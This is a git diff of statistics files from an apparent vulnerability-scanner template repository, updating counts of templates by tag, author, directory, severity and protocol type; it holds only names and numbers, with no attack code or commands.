"name":"wakatime","count":1},{"name":"gstorage","count":1},{"name":"nuxeo","count":1},{"name":"achecker","count":1},{"name":"sarg","count":1},{"name":"oidc","count":1},{"name":"opentsdb","count":1},{"name":"kerbynet","count":1},{"name":"bedita","count":1},{"name":"cobub","count":1},{"name":"froxlor","count":1},{"name":"rujjie","count":1},{"name":"rmc","count":1},{"name":"optiLink","count":1},{"name":"nearby","count":1},{"name":"dvr","count":1},{"name":"minimouse","count":1},{"name":"mautic","count":1},{"name":"zte","count":1},{"name":"extractor","count":1},{"name":"clockwatch","count":1},{"name":"trilithic","count":1},{"name":"myvuehelp","count":1},{"name":"clink-office","count":1},{"name":"ognl","count":1},{"name":"okta","count":1},{"name":"metabase","count":1},{"name":"graylog","count":1},{"name":"iceflow","count":1},{"name":"blind","count":1},{"name":"qdpm","count":1},{"name":"drone","count":1},{"name":"expose","count":1},{"name":"locations","count":1},{"name":"duomicms","count":1},{"name":"ruckus","count":1},{"name":"placeos","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"varnish","count":1},{"name":"pivotaltracker","count":1},{"name":"maxsite","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"visualtools","count":1},{"name":" default-login","count":1},{"name":"salesforce","count":1},{"name":"plone","count":1},{"name":"deviantart","count":1},{"name":"chevereto","count":1},{"name":"blue-ocean","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"natemail","count":1},{"name":"timezone","count":1},{"name":"nc2","count":1},{"name":"xml","count":1},{"name":"magicflow","count":1},{"name":"gloo","count":1},{"name":"sage","count":1},{"name":"totaljs","count":1},{"name":"wazuh","count":1},{"name":"plugin","count":1},{"name":"basic-auth","count":1},{"name":"apos","count":1},{"name":"hiboss","count":1},{"name":"cve202","count":1},{"name":"jenzabar","count":1},{"name":"mantis","count":1},{"name":"okiko","count":1},{"name":"javamelody","count":1},{"name":"photo","count":1},{"name":"dnssec","count":1},{"name":"graphql","count":1},{"name":"terraform","count":1},{"name":"ilo4","count":1},{"name":"yealink","count":1},{"name":"episerver","count":1},{"name":"postmessage","count":1},{"name":"novnc","count":1},{"name":"tensorflow","count":1},{"name":"newrelic","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"eyelock","count":1},{"name":"announcekit","count":1},{"name":"gateone","count":1},{"name":"tinypng","count":1},{"name":"szhe","count":1},{"name":"ganglia","count":1},{"name":"bazarr","count":1},{"name":"spring","count":1},{"name":"openrestry","count":1},{"name":"embedthis","count":1},{"name":"codemeter","count":1},{"name":"qvisdvr","count":1},{"name":"xiuno","count":1},{"name":"bingmaps","count":1},{"name":"playable","count":1},{"name":"synnefo","count":1},{"name":"moin","count":1},{"name":"raspap","count":1},{"name":"cloudinary","count":1},{"name":"k8s","count":1},{"name":"find","count":1},{"name":"smartblog","count":1},{"name":"memcached","count":1},{"name":"discourse","count":1},{"name":"huijietong","count":1},{"name":"dotnetnuke","count":1},{"name":"netgenie","count":1},{"name":"zm","count":1},{"name":"calendly","count":1},{"name":"mpsec","count":1},{"name":"solarlog","count":1},{"name":"phpwiki","count":1},{"name":"logontracer","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"redis","count":1},{"name":"asana","count":1},{"name":"artica","count":1},{"name":"fuelcms","count":1},{"name":"yzmcms","count":1},{"name":"couchbase","count":1},{"name":"emc","count":1},{"name":"owasp","count":1},{"name":"tenda","count":1},{"name":"svnserve","count":1},{"name":"oneblog","count":1},{"name":"diris","count":1},{"name":"frontpage","count":1},{"name":"weiphp","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"cloudron","count":1},{"name":"centreon","count":1},{"name":"plastic","count":1},{"name":"iptime","count":1},{"name":"sonarcloud","count":1},{"name":"tectuus","count":1},{"name":"camunda","count":1},{"name":"meraki","count":1},{"name":"jumpcloud","count":1},{"name":"hubspot","count":1},{"name":"bash","count":1},{"name":"tpshop","count":1},{"name":"circontrol","count":1},{"name":"wmt","count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"chinaunicom","count":1},{"name":"sgp","count":1},{"name":"default","count":1},{"name":"lokalise","count":1},{"name":"shopxo","count":1},{"name":"sangfor","count":1},{"name":"exponentcms","count":1},{"name":"csrf","count":1},{"name":"landray","count":1},{"name":"pgadmin","count":1},{"name":"etouch","count":1},{"name":"node-red-dashboard","count":1},{"name":"sendgrid","count":1},{"name":"viewpoint","count":1},{"name":"redmine","count":1},{"name":"tongda","count":1},{"name":"tileserver","count":1},{"name":"trane","count":1},{"name":"landrayoa","count":1},{"name":"gsoap","count":1},{"name":"pagerduty","count":1},{"name":"buildkite","count":1},{"name":"nette","count":1},{"name":"ewebs","count":1},{"name":"sceditor","count":1},{"name":"gotmls","count":1},{"name":"primetek","count":1},{"name":"mantisbt","count":1},{"name":"vsphere","count":1},{"name":"triconsole","count":1},{"name":"jfrog","count":1},{"name":"uwsgi","count":1},{"name":"ioncube","count":1},{"name":"centos","count":1},{"name":"manager","count":1},{"name":"zend","count":1},{"name":"fcm","count":1},{"name":"fortigate","count":1},{"name":"webui","count":1},{"name":"dom","count":1},{"name":"socomec","count":1},{"name":"mongo","count":1},{"name":"cloudflare","count":1},{"name":"zcms","count":1},{"name":"pendo","count":1},{"name":"vsftpd","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"dbeaver","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"ntopng","count":1},{"name":"faraday","count":1},{"name":"servicenow","count":1},{"name":"geutebruck","count":1},{"name":"turbocrm","count":1},{"name":"alertmanager","count":1},{"name":"k8","count":1},{"name":"swagger","count":1},{"name":"csod","count":1},{"name":"bullwark","count":1},{"name":"mysql","count":1},{"name":"octoprint","count":1},{"name":"ambari","count":1},{"name":"zzzcms","count":1},{"name":"daybyday","count":1},{"name":"ssltls","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"elsfa7110","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"github.com/its0x08","count":4},{"name":"0w4ys","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"idealphase","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"manas_harsh","count":2},{"name":"0xsapra","count":2},{"name":"whoever","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"r12w4n","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"sy3omda","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"r3naissance","count":2},{"name":"nkxxkn","count":2},{"name":"koti2","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"alifathi-h1","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"hahwul","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"x1m_martijn","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"absshax","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"52971","count":1},{"name":"0xtavian","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"defr0ggy","count":1},{"name":"micha3lb3n","count":1},{"name":"its0x08","count":1},{"name":"yavolo","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"lark lab","count":1},{"name":"nvn1729","count":1},{"name":"push4d","count":1},{"name":"wabafet","count":1},{"name":"droberson","count":1},{"name":"furkansenan","count":1},{"name":"orpheus","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"evolutionsec","count":1},{"name":"schniggie","count":1},{"name":"juicypotato1","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"zhenwarx","count":1},{"name":"akash.c","count":1},{"name":"affix","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"0h1in9e","count":1},{"name":"elmahdi","count":1},{"name":"rotemreiss","count":1},{"name":"mesaglio","count":1},{"name":"clarkvoss","count":1},{"name":"_c0wb0y_","count":1},{"name":"thebinitghimire","count":1},{"name":"qlkwej","count":1},{"name":"ahmetpergamum","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"shreyapohekar","count":1},{"name":"borna nematzadeh","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"shelld3v","count":1},{"name":"co0nan","count":1},{"name":"thevillagehacker","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shifacyclewla","count":1},{"name":"ringo","count":1},{"name":"c3l3si4n","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"jrolf","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"berkdusunur","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pratik khalane","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"whynotke","count":1},{"name":"tim_koopmans","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"bjhulst","count":1},{"name":"apt-mirror","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"regala_","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"naglinagli","count":1},{"name":"noamrathaus","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"nerrorsec","count":1},{"name":"forgedhallpass","count":1},{"name":"intx0x80","count":1},{"name":"akshansh","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"d0rkerdevil","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"rodnt","count":1},{"name":"luci","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"oscarintherocks","count":1},{"name":"kre80r","count":1},{"name":"thezakman","count":1},{"name":"chron0x","count":1},{"name":"@ofjaaah","count":1},{"name":"philippdelteil","count":1},{"name":"xstp","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"makyotox","count":1},{"name":"geraldino2","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"bolli95","count":1},{"name":"notsoevilweasel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"alex","count":1},{"name":"revblock","count":1},{"name":"sicksec","count":1},{"name":"mah3sec_","count":1},{"name":"hakluke","count":1},{"name":"ipanda","count":1},{"name":"mhdsamx","count":1},{"name":"mass0ma","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"izn0u","count":1},{"name":"taielab","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"retr0","count":1},{"name":"alph4byt3","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"b4uh0lz","count":1},{"name":"0xd0ff9","count":1},{"name":"aresx","count":1},{"name":"kareemse1im","count":1},{"name":"_darrenmartyn","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"nytr0gen","count":1},{"name":"infosecsanyam","count":1},{"name":"deena","count":1},{"name":"pdp","count":1},{"name":"blckraven","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"becivells","count":1},{"name":"jeya seelan","count":1},{"name":"petruknisme","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":832},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":140},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":645},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2205},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7e62861261..a401b344fc 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | +| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| default-login | 68 | milo2012 | 14 | | | | | | | -| oob | 68 | techbrunchfr | 13 | | | | | | | -| iot | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | wdahlenb | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | -| unauth | 49 | melbadry9 | 10 | | | | | | | +| iot | 68 | milo2012 | 14 | | | | | | | +| default-login | 68 | techbrunchfr | 13 | | | | | | | +| oob | 68 | suman_kar | 12 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| token-spray | 63 | cyllective | 11 | | | | | | | +| cve2017 | 51 | righettod | 10 | | | | | | | +| file | 50 | melbadry9 | 10 | | | | | | | +| unauth | 49 | nadino | 10 | | | | | | | | network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | righettod | 10 | | | | | | | +| ssrf | 41 | wdahlenb | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | aashiq | 8 | | | | | | | +| | 38 | zh | 8 | | | | | | | +| redirect | 37 | iamthefrogy | 8 | | | | | | | | cve2016 | 37 | that_juan_ | 8 | | | | | | | -| redirect | 37 | zh | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | -| logs | 30 | dr_set | 7 | | | | | | | -| google | 30 | emadshanab | 7 | | | | | | | -| jira | 28 | 0x240x23elu | 7 | | | | | | | -| atlassian | 28 | dogasantos | 7 | | | | | | | -| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | +| oracle | 36 | aashiq | 8 | | | | | | | +| google | 30 | harshbothra_ | 7 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| jira | 29 | oppsec | 7 | | | | | | | +| atlassian | 29 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 29 | dr_set | 7 | | | | | | | +| listing | 27 | emadshanab | 7 | | | | | | | +| cve2014 | 27 | meme-lord | 7 | | | | | | | | cisco | 27 | randomstr1ng | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | -| generic | 24 | oppsec | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 23 | puzzlepeaches | 6 | | | | | | | -| auth-bypass | 23 | logicalhunter | 6 | | | | | | | -| router | 21 | divya_mudgal | 6 | | | | | | | -| misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| cve2012 | 18 | ganofins | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | -| springboot | 18 | lu4nx | 5 | | | | | | | -| php | 16 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | yanyun | 5 | | | | | | | +| generic | 24 | dogasantos | 7 | | | | | | | +| auth-bypass | 23 | kophjager007 | 7 | | | | | | | +| misc | 23 | __fazal | 6 | | | | | | | +| disclosure | 23 | caspergn | 6 | | | | | | | +| misconfig | 21 | puzzlepeaches | 6 | | | | | | | +| router | 21 | pentest_swissky | 6 | | | | | | | +| aem | 19 | logicalhunter | 6 | | | | | | | +| springboot | 18 | divya_mudgal | 6 | | | | | | | +| sap | 18 | yanyun | 5 | | | | | | | +| debug | 18 | iamnoooob | 5 | | | | | | | +| cve2012 | 18 | xelkomy | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | | devops | 15 | johnk3r | 5 | | | | | | | -| weblogic | 14 | iamnoooob | 5 | | | | | | | -| login | 14 | elsfa7110 | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | panch0r3d | 5 | | | | | | | -| fuzz | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| fuzz | 14 | elsfa7110 | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | tess | 4 | | | | | | | | deserialization | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | nodauf | 4 | | | | | | | -| dns | 13 | johnjhacking | 3 | | | | | | | -| android | 13 | fyoorer | 3 | | | | | | | -| adobe | 13 | emenalf | 3 | | | | | | | -| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | -| dlink | 12 | f1tz | 3 | | | | | | | -| wp-theme | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | impramodsargar | 3 | | | | | | | -| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | binaryfigments | 3 | | | | | | | -| xxe | 10 | tess | 3 | | | | | | | -| dell | 10 | 0w4ys | 3 | | | | | | | -| hp | 10 | unstabl3 | 3 | | | | | | | -| vmware | 9 | dudez | 3 | | | | | | | -| kubernetes | 9 | shine | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| gitlab | 8 | mavericknerd | 3 | | | | | | | -| cve2008 | 8 | sushantkamble | 3 | | | | | | | -| backup | 8 | me9187 | 3 | | | | | | | -| scada | 8 | sullo | 3 | | | | | | | -| rails | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | shifacyclewala | 3 | | | | | | | -| ruijie | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | idealphase | 3 | | | | | | | -| nginx | 8 | bp0lr | 2 | | | | | | | -| airflow | 8 | 0xrudra | 2 | | | | | | | -| microsoft | 8 | socketz | 2 | | | | | | | -| fastjson | 8 | g4l1t0 | 2 | | | | | | | -| netgear | 7 | 0xsapra | 2 | | | | | | | -| cms | 7 | w4cky_ | 2 | | | | | | | +| dns | 13 | nodauf | 4 | | | | | | | +| android | 13 | github.com/its0x08 | 4 | | | | | | | +| zoho | 13 | z3bd | 3 | | | | | | | +| adobe | 13 | shifacyclewala | 3 | | | | | | | +| dlink | 12 | dudez | 3 | | | | | | | +| wp-theme | 12 | binaryfigments | 3 | | | | | | | +| jenkins | 12 | mavericknerd | 3 | | | | | | | +| manageengine | 12 | idealphase | 3 | | | | | | | +| cve2013 | 11 | skeltavik | 3 | | | | | | | +| magento | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | yash anand @yashanand155 | 3 | | | | | | | +| hp | 10 | 0w4ys | 3 | | | | | | | +| dell | 10 | sullo | 3 | | | | | | | +| xxe | 10 | me9187 | 3 | | | | | | | +| kubernetes | 9 | sushantkamble | 3 | | | | | | | +| vmware | 9 | vsh00t | 3 | | | | | | | +| ftp | 9 | unstabl3 | 3 | | | | | | | +| cnvd | 8 | impramodsargar | 3 | | | | | | | +| nginx | 8 | fyoorer | 3 | | | | | | | +| microsoft | 8 | jarijaas | 3 | | | | | | | +| scada | 8 | f1tz | 3 | | | | | | | +| ibm | 8 | shine | 3 | | | | | | | +| airflow | 8 | emenalf | 3 | | | | | | | +| rails | 8 | thomas_from_offensity | 3 | | | | | | | +| ruijie | 8 | johnjhacking | 3 | | | | | | | +| fastjson | 8 | joeldeleep | 2 | | | | | | | +| gitlab | 8 | bp0lr | 2 | | | | | | | +| cve2008 | 8 | g4l1t0 | 2 | | | | | | | +| backup | 8 | bing0o | 2 | | | | | | | +| cms | 7 | mohammedsaneem | 2 | | | | | | | +| coldfusion | 7 | w4cky_ | 2 | | | | | | | +| netgear | 7 | randomrobbie | 2 | | | | | | | +| files | 7 | kiblyn11 | 2 | | | | | | | | confluence | 7 | udit_thakkur | 2 | | | | | | | -| coldfusion | 7 | bernardofsr | 2 | | | | | | | -| files | 7 | arcc | 2 | | | | | | | -| drupal | 6 | r3naissance | 2 | | | | | | | -| jetty | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| docker | 6 | 0xsmiley | 2 | | | | | | | -| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| solr | 6 | pxmme1337 | 2 | | | | | | | -| lucee | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | koti2 | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| fileupload | 6 | davidmckennirey | 2 | | | | | | | -| api | 6 | huowuzhao | 2 | | | | | | | -| camera | 6 | vavkamil | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| windows | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| ssti | 5 | sy3omda | 2 | | | | | | | -| iis | 5 | cocxanh | 2 | | | | | | | -| tomcat | 5 | foulenzer | 2 | | | | | | | -| java | 5 | r12w4n | 2 | | | | | | | -| phpmyadmin | 5 | hahwul | 2 | | | | | | | -| printer | 5 | whoever | 2 | | | | | | | -| dedecms | 5 | x1m_martijn | 2 | | | | | | | -| crlf | 5 | gevakun | 2 | | | | | | | -| headless | 5 | kiblyn11 | 2 | | | | | | | -| circarlife | 5 | joeldeleep | 2 | | | | | | | -| solarwinds | 4 | 0xprial | 2 | | | | | | | -| thinkphp | 4 | afaq | 2 | | | | | | | -| npm | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | gal nagli | 2 | | | | | | | -| resin | 4 | randomrobbie | 2 | | | | | | | -| thinkcmf | 4 | manas_harsh | 2 | | | | | | | -| grafana | 4 | nkxxkn | 2 | | | | | | | -| webserver | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | 0xcrypto | 2 | | | | | | | -| fatpipe | 4 | random-robbie | 2 | | | | | | | +| drupal | 6 | koti2 | 2 | | | | | | | +| laravel | 6 | davidmckennirey | 2 | | | | | | | +| phpmyadmin | 6 | arcc | 2 | | | | | | | +| camera | 6 | gal nagli | 2 | | | | | | | +| solr | 6 | parth | 2 | | | | | | | +| citrix | 6 | huowuzhao | 2 | | | | | | | +| lucee | 6 | hetroublemakr | 2 | | | | | | | +| nodejs | 6 | 0xcrypto | 2 | | | | | | | +| jetty | 6 | nkxxkn | 2 | | | | | | | +| docker | 6 | swissky | 2 | | | | | | | +| fileupload | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | lotusdll | 2 | | | | | | | +| django | 6 | 0xsmiley | 2 | | | | | | | +| api | 6 | r3naissance | 2 | | | | | | | +| printer | 5 | gevakun | 2 | | | | | | | +| jolokia | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | x1m_martijn | 2 | | | | | | | +| java | 5 | ehsahil | 2 | | | | | | | +| headless | 5 | socketz | 2 | | | | | | | +| circarlife | 5 | r12w4n | 2 | | | | | | | +| ssti | 5 | whoever | 2 | | | | | | | +| crlf | 5 | ree4pwn | 2 | | | | | | | +| dedecms | 5 | alifathi-h1 | 2 | | | | | | | +| windows | 5 | afaq | 2 | | | | | | | +| iis | 5 | convisoappsec | 2 | | | | | | | +| npm | 4 | bernardofsr | 2 | | | | | | | +| amazon | 4 | vavkamil | 2 | | | | | | | +| zabbix | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| fatpipe | 4 | 0xprial | 2 | | | | | | | +| 